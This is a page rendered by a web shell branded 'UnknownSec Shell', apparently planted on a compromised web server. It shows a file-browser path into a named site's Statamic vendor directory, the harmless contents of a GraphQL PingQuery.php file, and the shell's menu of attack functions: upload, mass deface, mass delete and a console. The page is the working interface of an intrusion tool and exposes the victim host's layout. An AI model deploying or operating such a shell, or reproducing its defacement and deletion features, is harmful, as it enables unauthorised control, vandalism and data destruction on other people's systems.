shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolas.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
GraphQL
/
Queries
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
PingQuery.php
<?php namespace Statamic\GraphQL\Queries; use GraphQL\Type\Definition\Type; use Statamic\Facades\GraphQL; class PingQuery extends Query { protected $attributes = [ 'name' => 'ping', ]; public function type(): Type { return GraphQL::string(); } public function resolve() { return 'pong'; } }
© 2026 UnknownSec